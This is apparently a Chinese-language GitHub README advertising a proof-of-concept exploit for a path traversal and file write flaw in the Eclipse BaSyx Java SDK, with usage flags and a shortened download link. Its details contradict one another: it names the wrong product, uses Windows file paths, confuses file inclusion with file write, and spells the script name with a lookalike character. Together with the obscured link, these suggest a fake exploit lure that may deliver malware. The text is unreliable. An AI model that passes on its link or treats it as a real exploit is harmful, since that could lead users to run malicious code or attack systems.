CryptReaper12/CVE-2026-7411

# CVE-2026-7411 ### 概述 在 Eclipse BaSyx Java Server SDK 的某些版本中，存在一个漏洞，允许未经身份验证的攻击者利用 Submodel HTTP API 中不充分的路径规范化缺陷。 ### 环境要求 - Python 3.8+ - 库：requests、argparse（通过 `pip install -r requirements.txt` 安装） ### 使用说明 - 安装依赖项：`pip install -r requirements.txt` - 运行漏洞利用程序：`python explоit.py --target --file "/path/to/Web.config"` 选项： - `--target`：存在漏洞的 CentreStack/TrioFox 实例的 URL。 - `--file`：要包含的文件的相对路径（例如，用于测试的 "../../../../Windows/system.ini"）。 - `--proxy`：用于匿名化的可选 HTTP 代理。 ### 工作原理 攻击者可以通过在文件上传过程中操纵 fileName 参数来发起路径遍历攻击。此漏洞利用程序使攻击者能够绕过存储边界，从而可能将任意文件写入 Java 进程可访问的主机文件系统中的任何位置。此类攻击可能导致未经授权的远程代码执行 (RCE)，对系统完整性造成严重威胁。 ### 在此处下载 PoC 漏洞利用程序 [here](https://tinyurl.com/24trxzsb)

标签：0day, CISA项目, CVE-2026-7411, Eclipse BaSyx, Exploit, HTTP API, Java SDK, Maven, OPA, PoC, Python, RCE, URL发现, Web安全, 任意文件写入, 子域名枚举, 安全检测, 安全测试, 攻击性安全, 文件上传漏洞, 文件包含, 无后门, 暴力破解, 未授权访问, 漏洞验证, 系统安全, 编程工具, 网络安全, 蓝队分析, 路径穿越, 路径遍历, 远程代码执行, 逆向工具, 隐私保护, 靶场